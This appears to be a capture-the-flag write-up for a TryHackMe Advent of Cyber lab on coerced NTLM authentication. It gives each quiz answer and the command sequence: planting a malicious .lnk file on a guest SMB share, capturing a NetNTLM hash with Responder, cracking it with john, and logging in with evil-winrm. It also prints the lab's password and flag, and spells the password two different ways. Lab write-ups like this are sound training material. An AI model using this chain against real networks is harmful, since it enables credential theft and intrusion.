AoC_RelayAllTheWayV6 (AOC_2023 DAY-23)

[Day 23] Coerced Authentication Relay All the Way

In this task we use the Attackbox to do this challenge!!

1. What is the name of the AD authentication protocol that makes use of tickets?

Kerberos

2. What is the name of the AD authentication protocol that makes use of the NTLM hash?

NetNTLM

3. What is the name of the tool that can intercept these authentication challenges?

Responder

4. What is the password that McGreedy set for the Administrator account?

For this you have to go to the following directory:

cd /root/Rooms/AoC2023/Day23/ntlm_theft/ and then

cd stealthy

After this write the command to connect with the smbclient.

smbclient //10.10.69.51/ElfShare/ -U guest%

//10.10.69.51/ElfShare/: This is the SMB share path you are connecting to.

-U guest%: This is specifying the username as "guest" and an empty password ("%").

put stealthy.lnk

dir

Now on the other terminal run the Responder cmd

responder -I ens5

It took several minutes to connect. In the mean time download the file of mcgreedy.txt

And in the another tab you will see some responses. Copy the hash in hash.txt and do the following:

john --wordlist=greedykeys.txt hash.txt

And this will give us the password which is GreedyGrabber1@.

GreedyGrabbber1@

5. What is the value of the flag that is placed on the Administrator’s desktop?

For this we will use evil-winrm to connect the Windows. And go to the Desktop directory.

Here, we will write ls or dir to know the content of the directory and get the flag.txt file

THM{Greedy.Greedy.McNot.So.Great.Stealy}

Thanks for reading!!